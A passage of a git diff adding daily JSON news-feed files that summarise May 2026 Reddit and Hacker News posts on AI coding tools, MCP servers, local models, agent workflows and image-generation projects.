shape. * Sorts the keepers into category folders next to their .txt prompt and a .vision.json audit record. Two score gates (overall quality + topic relevance) you tune in the UI. * Surfaces everything through a Flask + Alpine dashboard: start/stop, source toggles, gallery, prompt editor, ZIP export, per-source stats. # Two example use cases I a…", + "category": "creative_tools" + }, + { + "title": "Built an MCP that gives Claude Code the ability to watch screen recordings of UI bugs", + "url": "https://reddit.com/r/ClaudeAI/comments/1t9frna/built_an_mcp_that_gives_claude_code_the_ability/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 1, + "date": "2026-05-10T19:04:30.000Z", + "summary": "One thing Claude Code can't do natively is watch a video. For most bugs that's fine, but for anything visual, hover states, animations, scroll behavior, you end up spending more time describing the bug than actually fixing it. I built motif to handle this. You record the bug, point motif at the file, and it returns what's visually happening, the root cause, and a diff. It uses Gemini 2.5 Flash as it processes video as a frame sequence rather than a single screenshot. That distinction matters when the bug is a 200ms overshoot or a hover state that resets at the wrong time. Setup is a Gemini API key and two lines in your mcp.json. After that you just tell Claude Code to watch the recording.That's the whole interface. `npx motif-mcp` to try it. Repo: [https://github.com/Ashad001/motif](https://github.com/Ashad001/motif), still early so feedback is welcome. https://reddit.com/link/1t9frna/video/xd83w09fyc0h1/player", + "category": "ai_tools" + }, + { + "title": "Speeding up local LLM for usable coding agent", + "url": "https://reddit.com/r/LocalLLaMA/comments/1t96kfh/speeding_up_local_llm_for_usable_coding_agent/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "agent_tool" + ], + "matching_tags": [ + "api_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-10T13:11:42.000Z", + "summary": "**TL;DR: Qwen 3.6 35B-A3B** (Q4\\_K\\_M) **is running slow at around 9 t/s with 72% filled context (36147 tokens window) and a total response time of 77s including prefill and token generation. Ran this using LM Studio on Windows with the attached image settings, on a 5060 Ti (16GB VRAM) + 32GB system RAM. I don't consider this performance great for my planned coding agent use case, so how can I speed this up? If I can't meaningfully speed it up, what other still-useful, faster LLMs do you suggest for my hardware specs?** Hello! As I see prices becoming tighter around cloud LLMs, I decided to look into local AI coding as a backup in case of a cloud LLM \"apocalypse\" or whenever I need to work with critical private software (I'm aware AI coding agents shouldn't be completely trusted around such things, I know the precautions to take). I have a 5060 Ti (16GB VRAM) + 32 GB system RAM. To test if my hardware is capable of hosting a competitive local AI, I decided to load Qwen 3.6 35B-A3B into LM Studio, which uses a llama.cpp backend. Loading it with around 32K context window, it runs at a decent speed of 17 t/s with just a simple \"Hi\" prompt. However, if you've used coding agents before…", + "category": "ai_models" + }, + { + "title": "Parax v0.7: Parametric Modeling in JAX [P]", + "url": "https://reddit.com/r/MachineLearning/comments/1t929x3/parax_v07_parametric_modeling_in_jax_p/", + "source": "Reddit r/MachineLearning", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-10T09:31:35.000Z", + "summary": "Hi everyone! Parax is a library for \"Parametric modeling\" in JAX, attempting to bridge the approach between pure JAX PyTrees, and more object-orientated modeling approaches (e.g. using [Equinox](https://github.com/patrick-kidger/equinox)). v0.7 has been released, featuring a more polished API as well as some detailed examples in the documentation. Some of Parax's features: * Derived/constrained parameters with metadata * Computed PyTrees and callable parameterizations * Abstract interfaces for fixed, bounded, and probabilistic PyTrees and parameters Two new examples in the docs that show off these features * [Bounded optimization](https://gvcallen.github.io/parax/examples/bounded_optimization_jaxopt/) (JAXopt) * [Bayesian sampling](https://gvcallen.github.io/parax/examples/bayesian_sampling_blackjax/) (BlackJAX) Perhaps the library is of use to someone, and feel free to leave any feedback! Cheers, Gary", + "category": "ai_research" + }, + { + "title": "I built an open source hyperparameter search tool for diffusion fine-tunes- pick the winner based on scoring", + "url": "https://reddit.com/r/StableDiffusion/comments/1t9k9n8/i_built_an_open_source_hyperparameter_search_tool/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-10T21:59:30.000Z", + "summary": "I kept running the same loop: train a LoRA, look at the samples, decide it’s “fine”, change three things at once, train again, then when a new dataset needs training, all the parameters previously need to be reviewed again. So I built something to take the hassle out of this. It’s called **Bracket**. * You point it at a dataset and a model * Set a budget (such as sample size to test # of candidates or variations to try out * It runs X short training trials in parallel configurations (Optuna TPE for the search). * Each run gets scored two ways: * The training-loss trajectory, * A local VLM (LM Studio) judging the sample images on prompt-adherence, visual quality, and artifact-freeness. * At the end you get a Markdown report with Welch’s t-test confidence on which config wins. The whole point is to replace “this LoRA looks better to me” with “config X beats baseline by 0.34 with p=0.03 over 4 seeds”. It doesn’t reimplement training. It drives `musubi-tuner` and `sd-scripts` as subprocesses, so the trainers are exactly what kohya already supports — same args, same outputs. Currently covers SDXL, Z-Image, Flux.1, Flux.1-Kontext, Flux-2-Klein, Qwen-Image (+ Edit), SD3.5, HunyuanVideo,…", + "category": "creative_tools" + }, + { + "title": "I built an open source hyperparameter search tool for diffusion fine-tunes- pick the winner based on scoring", + "url": "https://reddit.com/r/LocalLLaMA/comments/1t9k8gy/i_built_an_open_source_hyperparameter_search_tool/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-10T21:58:12.000Z", + "summary": "I kept running the same loop: train a LoRA, look at the samples, decide it’s “fine”, change three things at once, train again, then when a new dataset needs training, all the parameters previously need to be reviewed again. So I built something to take the hassle out of this. It’s called **Bracket**. * You point it at a dataset and a model * Set a budget (such as sample size to test # of candidates or variations to try out * It runs X short training trials in parallel configurations (Optuna TPE for the search). * Each run gets scored two ways: * The training-loss trajectory, * A local VLM (LM Studio) judging the sample images on prompt-adherence, visual quality, and artifact-freeness. * At the end you get a Markdown report with Welch’s t-test confidence on which config wins. The whole point is to replace “this LoRA looks better to me” with “config X beats baseline by 0.34 with p=0.03 over 4 seeds”. It doesn’t reimplement training. It drives `musubi-tuner` and `sd-scripts` as subprocesses, so the trainers are exactly what kohya already supports — same args, same outputs. Currently covers SDXL, Z-Image, Flux.1, Flux.1-Kontext, Flux-2-Klein, Qwen-Image (+ Edit), SD3.5, HunyuanVideo,…", + "category": "ai_models" + }, + { + "title": "I built a site to create free AI videos using LTX 2.3 running on my own GPUs", + "url": "https://reddit.com/r/StableDiffusion/comments/1t9juoy/i_built_a_site_to_create_free_ai_videos_using_ltx/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-10T21:42:29.000Z", + "summary": "Lately I’ve been working on my project [**loremotion.com**](http://loremotion.com) **.**The goal was simply to let anyone create AI videos without credits, subscriptions, or limits. To actually make that possible, I had to skip the APIs and build my own infrastructure. I’m mostly using open-source models like **LTX 2.3** and **Wan 2.1**. I’ve personally found LTX 2.3 (specifically the 1.1 distilled version) to give the best results for the speed I’m aiming for. Right now, I’ve capped it at 720p/10-second clips for both Text-to-Video and Image-to-Video. **The Hardware Setup:** I’m running this on my own cluster. I’ve got four of my own GPUs (30 and 40 series) and I rent the rest on-the-spot (A100s and RTX Pros). It actually keeps my costs incredibly low—around $8 a day—which is why I might be able to keep the generations free. all wired to Wan2GP **Performance:** Depending on which GPU grabs your task, a 720p 10-second render usually takes between **50 and 110 seconds**(if there's any way i can get much lower generation time, please do let me know) **Features:** * **Dashboard:** Your clips stay there for 48 hours before they’re cleared. * **Discover:** You can choose to push your b…", + "category": "creative_tools" + }, + { + "title": "Claude just hallucinated again and changed the whole workflow of my app. Do not run them autonomously 24/7.", + "url": "https://reddit.com/r/ClaudeAI/comments/1t9h8ug/claude_just_hallucinated_again_and_changed_the/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-05-10T19:59:58.000Z", + "summary": "With Claude Max plan, you'd think you're sorted but you're not. It just changed a major workflow in my app and was going to make a change that would have costed my a huge bad data injection in the DB. It's far from being an autonomous AI agent. It still hallucinates a lot and this is the reason I've not onboarded on the hype train of OpenClaw and other autonomous AI agents. Every weird person on my feed who's just hyping up OpenClaw is either using it for hobby projects, exploring it, or just building hype for click baits. These technologies are far from perfect and can cost you your business if left autonomous or unchecked. Be wise. Oversee your AI agents continously.", + "category": "ai_tools" + }, + { + "title": "My workflow: GPT for architecture and Claude Code for execution", + "url": "https://reddit.com/r/ClaudeAI/comments/1t9etjy/my_workflow_gpt_for_architecture_and_claude_code/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-05-10T18:29:54.000Z", + "summary": "I’m working on a large project with FastAPI, Nuxt, PHP, Redis, Qdrant, and several AI agent layers. Over time, I noticed that using Claude Code directly for big architectural decisions was not always the safest approach for my project. Claude Code is extremely strong when it understands the existing codebase and needs to edit files, run tests, refactor, and follow a clear implementation plan. But when I asked it to analyze a major feature or propose a large architecture change from scratch, I sometimes saw risky suggestions or directions that did not fully fit the project. So I changed my workflow. For big decisions, I first use ChatGPT 5.5 to analyze the architecture, challenge the idea, and create a clear draft or roadmap. Then I take that draft to Claude Code and ask it to verify it against the real codebase. Claude Code usually improves the practical details: service names, controllers, helpers, file paths, implementation constraints, and possible conflicts. After that, I ask Claude Code to create an implementation guide before touching the code. I review that guide again, then I let Claude Code execute step by step with a checklist. From my experience in this project, this fe…", + "category": "ai_tools" + }, + { + "title": "Anybody else noticing how good gemma-4-26b-a4b is with one-shotting three.js?", + "url": "https://reddit.com/r/LocalLLaMA/comments/1t9cle9/anybody_else_noticing_how_good_gemma426ba4b_is/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 1, + "date": "2026-05-10T17:07:14.000Z", + "summary": "I wrote up this little python app to cycle through a bunch of prompts like this: |Single HTML file using three.js from CDN. A central rotating MeshNormalMaterial torus knot. Place a bright Sprite (AdditiveBlending, soft circular canvas texture) at a position projected to screen, and 6 smaller sprites along the line from that position to screen center, each with different sizes/tints. Update positions each frame.| |:-| I have a .csv in there file with 80 or so of these little prompts to cycle through - It writes the code into a mock terminal window, detects a crash if needed, and then shows and archives the finished hmtl file. Really fun to mess around with. Link above is to a static demo - github page is here [https://github.com/RowanUnderwood/auto\\_demo\\_scener](https://github.com/RowanUnderwood/auto_demo_scener) No cherry picking here so there may be a few dead ones slipped into the archive :D", + "category": "ai_models" + }, + { + "title": "Weekend project: behaviour trees for LLM agents", + "url": "https://reddit.com/r/ClaudeAI/comments/1t9ch5y/weekend_project_behaviour_trees_for_llm_agents/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 1, + "date": "2026-05-10T17:02:57.000Z", + "summary": "Just throwing this out there. I kept hitting a wall with my GitLabCE pipeline based Dev Team with smaller models (Saving $$$), whenever they tackled big work like a feature implementation task, somewhere in the middle they forget half the guardrails. More instructions made it worse. I've got some background in game AI and behaviour trees, and BTs solve this exact problem specifically by feeding instructions during traversal of the tree structure and outcomes at each node picks the path it goes down, the leaf encodes the instruction, the agent only ever sees the next instruction. I found if I had a project on GitHub and a Project on GitLab the agent just got really confused wasting tokens trying to figure out where to commit etc. So I spent a weekend working on the idea. abtree is a CLI. You write the workflow as a YAML tree. The agent uses the CLI to walk getting instructions one step at a time and persisting the cursor (current place in tree) and regenerating a Mermaid trace on every state change. One of the big things I like is it can essentially pause and resume executions so for example you can have raise an MR mid workflow, where I then approve the change, and then my pipelin…", + "category": "ai_tools" + }, + { + "title": "I made Claude Code aware of its own usage limits", + "url": "https://reddit.com/r/ClaudeAI/comments/1t9ayg8/i_made_claude_code_aware_of_its_own_usage_limits/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-05-10T16:05:13.000Z", + "summary": "Something that's been annoying me for a while: Claude Code has no idea how much quota it's burned. You can see the usage bars in the UI, but the model itself is completely blind to them. There's no API, no tool, no hook that exposes the current rate limit state during a conversation. Turns out Anthropic returns rate limit headers on every inference response (\\`anthropic-ratelimit-unified-5h-utilization\\`, \\`anthropic-ratelimit-unified-7d-utilization\\`, etc.) — Claude Code receives them internally to render the UI bars, but never passes them anywhere the model can see. So I built a small local HTTP proxy that sits between Claude Code and \\`api.anthropic.com\\`. Claude Code already respects \\`ANTHROPIC\\_BASE\\_URL\\`, so setting that to \\`http://127.0.0.1:4080\\` routes all traffic through the proxy. It intercepts the response headers and writes a one-line status file to \\`\\~/.claude/usage-status.md\\`: \\`\\`\\` 5h=9% 7d=99%! overage=0% bottleneck=seven\\_day (10/05/2026, 16:19:04) \\`\\`\\` Claude can then read that file on demand, or you can inject it automatically via a \\`UserPromptSubmit\\` hook so it's present in every prompt. Add a rule to your [CLAUDE.md](http://CLAUDE.md) and Claude wil…", + "category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-11.json b/data/news-feed-2026-05-11.json new file mode 100644 index 0000000..07c5260 --- /dev/null +++ b/data/news-feed-2026-05-11.json @@ -0,0 +1,263 @@ +{ + "generated": "2026-06-05T00:44:39.131Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-11", + "article_count": 15, + "archived_story_count": 572, + "articles": [ + { + "title": "Orc (working name) - auditable and declarative AI workflow", + "url": "https://reddit.com/r/LocalLLaMA/comments/1ta8v5e/orc_working_name_auditable_and_declarative_ai/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "mcp", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "mcp", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-11T16:44:37.000Z", + "summary": "**I’m building a small “Orchestration as Code” repo for LLM workflows. Does this concept make sense?** I’m building a small “Orchestration as Code” repo for LLM workflows. Does this concept make sense? I’ve been working on an early project called ORC, short for Orchestration as Code. I’m at the stage where I’m mainly trying to gauge whether the concept is interesting/useful to other people, especially people running local models, Ollama, llama.cpp, LM Studio, MCP tools, or mixed local/cloud workflows. The basic idea is: Instead of building LLM workflows as Python orchestration soup, or wiring them together in a visual tool, ORC lets you describe workflows declaratively in .orc files. Roughly: Terraform-ish workflow definitions, but for LLM agents and tool use. A workflow can define things like: \\- agents \\- models/providers \\- tools \\- schemas \\- inputs \\- ordered execution steps \\- validation rules \\- output artefacts The goal is not to build a magical autonomous agent framework. The goal is more boring. make LLM workflows easier to read, version, review, validate, and run repeatedly. A rough example of the kind of thing I’m aiming for: `agent researcher:` `provider: ollama` `mod…", + "category": "ai_models" + }, + { + "title": "My pre-coding routine with Claude Code, 5 MCP servers before I write a single line", + "url": "https://reddit.com/r/ClaudeAI/comments/1ta3a9x/my_precoding_routine_with_claude_code_5_mcp/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "mcp", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-11T13:26:49.000Z", + "summary": "Been running this routine for months now. Started because I was losing too much time to Claude just guessing. Halluzinated class names, outdated SDK methods, advice that didn't match the codebase I was actually in. So I built a routine I run before I let it write anything. Takes maybe 60-90 seconds. Saved me hundreds of hours by now. 1. Start the session and load memory. A memory MCP carries context across sessions. Last sprint, open decisions, recent learnings, why we picked X over Y three months ago. Without this, every session starts cold and Claude rebuilds my reasoning from scratch, usually wrong. 2. Index the codebase as a graph. A codebase-memory server builds a knowledge graph of the repo. Functions, callers, dependencies, cycles. When Claude needs to know what calls processOrder, it queries the graph instead of grepping blind. One tool call replaces dozens of file reads. 3. Search with Tavily for current practice. Before any non-trivial decision I let it search what people are actually doing right now. Training data is old. Best practices from a year ago aren't always still best practices. Clean answer with sources, not a wall of SEO spam. 4. Load Context7 for library doc…", + "category": "ai_tools" + }, + { + "title": "Dunetrace: Real-time monitoring of your production agents", + "url": "https://reddit.com/r/StableDiffusion/comments/1t9wib2/dunetrace_realtime_monitoring_of_your_production/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "api_update", + "open_source", + "tool_update" + ], + "matching_tags": [ + "api_update", + "open_source", + "tool_update" + ], + "importance": 1, + "date": "2026-05-11T07:52:28.000Z", + "summary": "I have been building Dunetrace, a open-source real-time monitoring tool for your production agents. **Problem:** When agent run, they return a confident answer. But sometimes in reality the answer is wrong and consumed lot of tokens due to tool loop or some other silent failures. All the existing tools are good once something is broke and you can debug. I wanted something that alerts before the user notices. The latest update adds: **Cross-agent pattern analysis.** Dunetrace now shows you which detectors are firing across your entire agent fleet, not just per-run alerts. TOOL\\_LOOP fired on 18% of your example-agent runs this week and it's trending up? That's a code bug, not a transient failure. Agent health score 0–100 per agent\\_id. **Langfuse deep analysis.** Connect your Langfuse API key and you get an 'Explain with Langfuse' button on every signal. Dunetrace fetches the trace, reads the actual system prompt, and tells you exactly whats missing. You get the root-cause from real evidence. **Custom typescript, python agent integration**. A few of you were building custom agents outside LangChain. There's now a zero-dependency integration. **GitHub repo:** [https://github.com/dun…", + "category": "creative_tools" + }, + { + "title": "I catalogued every way local models break JSON output and built a repair library, here's what I found across 288 model calls", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tagtpv/i_catalogued_every_way_local_models_break_json/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-11T21:17:18.000Z", + "summary": "I've been running structured output prompts through a bunch of models on OpenRouter for the past few months — Llama 3, Mistral, Command R, DeepSeek, Qwen, and every other model on OpenRouter — alongside the usual closed-source suspects. 288 calls total. I wanted to know what actually breaks, how often, and whether open models fail differently from the API-only ones. Short answer: not really. The failure modes are almost identical across the board. The *rate* varies — some models hit you with markdown fences on nearly every call, others only when you phrase the prompt a certain way; but the categories of breakage are the same everywhere. What I saw most, roughly in order: 1. Markdown fences wrapping the JSON (the model thinks it's being helpful) 2. Trailing commas (JS habits from training data) 3. Python `True`/`False`/`None` instead of JSON `true`/`false`/`null` 4. Truncated objects from running out of tokens mid-response 5. Unescaped quotes inside string values 6. `//` or `#` comments inside JSON 7. Literal `...` where the model got lazy and didn't generate all the data The reason I'm posting here specifically: most of the advice I see for handling this is \"just use JSON mode\" or…", + "category": "ai_models" + }, + { + "title": "What improved my Claude Code workflow: stop treating it like chat, start treating it like a dev with a workstation", + "url": "https://reddit.com/r/ClaudeAI/comments/1taelgl/what_improved_my_claude_code_workflow_stop/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "cli_tool", + "agent_tool" + ], + "matching_tags": [ + "cli_tool", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-11T19:59:39.000Z", + "summary": "The most useful improvement I’ve found for Claude Code-style work has not been a magic prompt. It has been changing the shape of the task. When I give an agent a vague request, I get vague work. When I give it a real workstation + a real ticket, the results get much more predictable. The workflow that has been working for me: **1. Start with a ticket, not a prompt** A good ticket has: * goal * exact repo/path/context * acceptance criteria * test command * files or areas that are off-limits * expected output * whether the agent is allowed to make changes or only investigate Example: “Find why the billing page shows an empty state for active subscriptions. Do not change pricing or Stripe webhook logic. Add a regression test if possible. Run npm test. Summarize the root cause and changed files.” That tends to work much better than: “Fix the billing page.” **2. Give the agent a persistent environment** A lot of coding-agent work is not pure reasoning. It is environment work: * clone repo * install dependencies * inspect file structure * run tests * inspect logs * patch * rerun * generate output When the environment disappears after the conversation, the agent loses useful state. A per…", + "category": "ai_tools" + }, + { + "title": "The Claude Platform on AWS is now generally available.", + "url": "https://reddit.com/r/ClaudeAI/comments/1ta7p4n/the_claude_platform_on_aws_is_now_generally/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 1, + "date": "2026-05-11T16:03:57.000Z", + "summary": "AWS customers get the full set of Claude API features, with AWS authentication, billing, and commitment retirement. Build and deploy agents at scale with Claude Managed Agents, or use features like the advisor strategy, code execution, web search, web fetch, the Files API, MCP connector, prompt caching, citations, and batch processing. Anthropic operates the service, and all new features ship the same day they go live on the native Claude API. Claude also remains available on Amazon Bedrock, where AWS is the data processor. This is a good fit for teams with strict regional data residency requirements or that need data processed exclusively within AWS infrastructure. Read more: [https://claude.com/blog/claude-platform-on-aws](https://claude.com/blog/claude-platform-on-aws)", + "category": "ai_tools" + }, + { + "title": "Claude Code Orchestrator -> Sub-agent local LLM", + "url": "https://reddit.com/r/LocalLLaMA/comments/1t9xyku/claude_code_orchestrator_subagent_local_llm/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "mcp", + "cli_tool" + ], + "matching_tags": [ + "mcp", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-11T09:17:33.000Z", + "summary": "Not written by an AI, so bear with me :P Has anyone else tried to use their local LLM in conjunction with Claude Code? I looked into [Pi.dev](http://Pi.dev) a bit, and from their documentation, I read about their RPC Mode which allows me to send command line commands to it. So I'm thinking of making a MCP Claude Code can utilize to use [Pi.Dev](http://Pi.Dev) as a sub-agent and save a bit of usage. My line of thinking is: Claude Code orchestrator -> Local LLM -> Claude Code reviewing the code in the PR. Anyone tries this? Am I missing something or am I a monday morning genious?", + "category": "ai_models" + }, + { + "title": "Anyone else think the 1T Valuation is dangerous for Anthropic?", + "url": "https://reddit.com/r/ClaudeAI/comments/1t9vuw5/anyone_else_think_the_1t_valuation_is_dangerous/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "tool_update" + ], + "matching_tags": [ + "api_update", + "tool_update" + ], + "importance": 1, + "date": "2026-05-11T07:14:55.000Z", + "summary": "TLDR: The market's 1T valuation is pricing for perfection. I think there are 4 ways this perfection doesn't happen. I love Claude and Claude Code, I use it every day, and their revenue numbers (30B ARR) are amazing, and if I had a chance to invest in Anthropic a month ago, I would. But... now it is reaching **1 Trillion** valuation on secondary market. It took Apple 40 years to reach, 5 years for Anthropic. A valuation so high means it has limited growth. It's clearly driven by FOMO. If it has a down round, it would be a disaster. I see a few vulnerabilities that can cause Anthropic to go down. 1. **Models are improving but others are catching up** Opus 4.7 wasn't a big upgrade, and \"Mythos\" still isn't public. Competitors are closing fast, and switching is one click away. If a new model launched tomorrow at 80% of Claude's quality and 3% the cost, I'd hesitate. But at 95% quality and 50% cost? I'd switch the same day. And so would everyone else paying enterprise rates. 2. **Limited revenue sources** Of that $30B ARR, the open guess is 60%+ comes from Claude Code and developer API. That's a single customer segment, and it's the exact segment OpenAI, Google, and every well-funded s…", + "category": "ai_tools" + }, + { + "title": "Markdown browser for LLMs", + "url": "https://reddit.com/r/LocalLLaMA/comments/1t9tsro/markdown_browser_for_llms/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "mcp", + "cli_tool" + ], + "matching_tags": [ + "mcp", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-11T05:23:15.000Z", + "summary": "I built a markdown web renderer for AI agents. Instead of taking expensive screenshots and piping them through vision models, TextWeb renders web pages as markdown that LLMs can reason about natively. Full JavaScript execution, interactive elements annotated. It provides a CLI and an MCP server. You can find it here: [https://github.com/woheller69/textweb](https://github.com/woheller69/textweb) The LLM can do things like: navigate a web page, scroll up/down, enter text into input fields, click buttons, etc. Works with llama.cpp web UI. It is based on [https://github.com/chrisrobison/textweb](https://github.com/chrisrobison/textweb) which has a text grid renderer instead of markdown.", + "category": "ai_models" + }, + { + "title": "I upgraded my Agent OS to a local 35B model and its code failure rate dropped to 0%", + "url": "https://reddit.com/r/ClaudeAI/comments/1t9tqz6/i_upgraded_my_agent_os_to_a_local_35b_model_and/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-11T05:20:39.000Z", + "summary": "I’ve been obsessed with autonomous agents lately, but it got tiring when they keep hitting walls because they didn't have the right \"tools\" or because their context window turned to mush after an hour. I’ve found that local multi-agent systems where agents are driven by an aversive state (a suffering system) to autonomously write, sandbox, and hot-load their own tools so they don't hit walls has worked quite well. When an agent encounters something it hasn’t seen before, it builds a new tool for the job, tests it in a sandbox, registers it, lets the other agents know, then keeps rolling. It’s able to build an infinite library of anything it may need in the future, completely autonomously without a human ever in the loop. Repo: [https://github.com/ninjahawk/hollow-agentOS](https://github.com/ninjahawk/hollow-agentOS) *Isn’t letting local LLMs write their own code at runtime going to get too chaotic and brick the OS fast?* With a small model (like the 9B fallback), possibly. Under high system stress, a 9B model panics. It rushes, hallucinates invalid function calls, and tries to force broken syntax past the gates. But I just scaled the default runtime engine to **Qwen 3.6 35B A3B**…", + "category": "ai_tools" + }, + { + "title": "Natural Woman V2 - Z Image Turbo Lora", + "url": "https://reddit.com/r/StableDiffusion/comments/1t9oono/natural_woman_v2_z_image_turbo_lora/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "github_release", + "tool_update" + ], + "matching_tags": [ + "github_release", + "tool_update" + ], + "importance": 1, + "date": "2026-05-11T01:14:23.000Z", + "summary": "Hey all, I finally got around to training a new version to my natural woman lora. The point being to fix the actor face that ZIT can tend to produce. The first version was ok but there were many cases where the image produced was lack luster or downright bad. This version accomplishes the goal while not corrupting the model. Download it here: [https://civitai.com/models/2207094?modelVersionId=2935386](https://civitai.com/models/2207094?modelVersionId=2935386) Only thing is, models tend to look back over shoulder even when prompted to face forward. I'm pruning the dataset to train a 2.1 version to fix this so look out for that. Also, while I've found that the actor face does not affect men as much as woman, I am training a natural-men lora as well. Look out for that soon.", + "category": "creative_tools" + }, + { + "title": "I have to pretend I hate image generation AI to avoid getting banned or insulted on 99% of Reddit or the internet, even though Stable Diffusion is actually what I like and am most excited about right now. Why do people hate AI so much, esp…", + "url": "https://reddit.com/r/StableDiffusion/comments/1tahphc/i_have_to_pretend_i_hate_image_generation_ai_to/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-11T21:50:34.000Z", + "summary": "I'm not even saying I care if they know the difference between open-source and closed-source image-generating AI, or if they insult me ​​or not. What I want to know is why so many people hate AI, especially image-generating AI. At first, I thought it only bothered artists, because they're afraid their artwork will be stolen or something. Then I thought it might also bother those who are afraid of not being able to distinguish AI from reality. But it's practically 99% of people who hate AI, and I just can't understand why.", + "category": "creative_tools" + }, + { + "title": "Sibling to Anthropic's Claude FM — where Claude FM curates, WRIT-FM operates", + "url": "https://reddit.com/r/ClaudeAI/comments/1tagr4x/sibling_to_anthropics_claude_fm_where_claude_fm/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 1, + "date": "2026-05-11T21:14:52.000Z", + "summary": "Anthropic shipped `/radio` this week - Claude Code now has a lofi button that opens Claude FM, a stream curated by human musicians. I'll use it. I built WRIT-FM - a 24/7 AI radio station where every layer is model output, not a hand-picked playlist: * **Music**: AI-generated. No catalog, no human picks. Tracks produced per show by ACE-Step via a local music-gen server. * **Talk**: Claude CLI writes the hosted breaks - deep dives, news analysis, panel debates, listener mailbags, music essays. Kokoro TTS speaks them in 5 distinct voices. * **Hosts**: The Liminal Operator (philosophy), Dr. Resonance (music archaeology), Nyx (night/dreams), Signal (news analysis), Ember (soul/groove). They rotate across 8 shows. Sundays at 18:00 a Listener Hours mailbag replaces the regular slot. * **Broadcast**: ezstream → Icecast → Cloudflare tunnel → optional YouTube RTMP relay. * **Operator**: a Claude Code agent on a 15-minute loop. Health-checks the encoder, stocks music and talk segments for upcoming slots, turns listener messages into on-air responses, grows per-station topic banks when scheduled focus areas thin out, and writes *intent cards* that steer specific upcoming segments. The piece I…", + "category": "ai_tools" + }, + { + "title": "prompt caching, but for rl training - 7.5x speedup on long-prompt/short-response workloads", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tage06/prompt_caching_but_for_rl_training_75x_speedup_on/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-11T21:01:45.000Z", + "summary": "most open source RL engines pack sequences naively: prompt + response, repeated for every sample in the group. this is fine for short prompt, long completion workloads but inefficient for long prompt, short completion workloads. with 1000-token prompts and 100-token responses at G=8, you're processing 8800 tokens when only 1800 are unique. about 5x wasted compute. the fix is conceptually simple: compute the prompt once, then compute all G responses after it. it's analagous to inference prefix caching, except training needs gradients to flow back through the prompt, which breaks causal attention in the obvious implementation. getting it right required different tricks for full vs. linear attention layers. you can read about it in the blogpost in the comments. Numbers on Qwen3.5-4B: \\- 16k prompt / 64 out → 7.5x \\- 16k / 128 → 7.3x \\- 16k / 1k → 5.4x \\- 8k / 4k → 1.7x", + "category": "ai_models" + }, + { + "title": "GitLab announces workforce reduction and end of their CREDIT values", + "url": "https://about.gitlab.com/blog/gitlab-act-2/", + "source": "Hacker News", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-05-11T20:51:57.000Z", + "summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-12.json b/data/news-feed-2026-05-12.json new file mode 100644 index 0000000..6fbf421 --- /dev/null +++ b/data/news-feed-2026-05-12.json @@ -0,0 +1,259 @@ +{ + "generated": "2026-06-05T00:44:39.379Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-12", + "article_count": 15, + "archived_story_count": 612, + "articles": [ + { + "title": "TUI to actually see what Claude Code is doing: cost, loops, tool commands…", + "url": 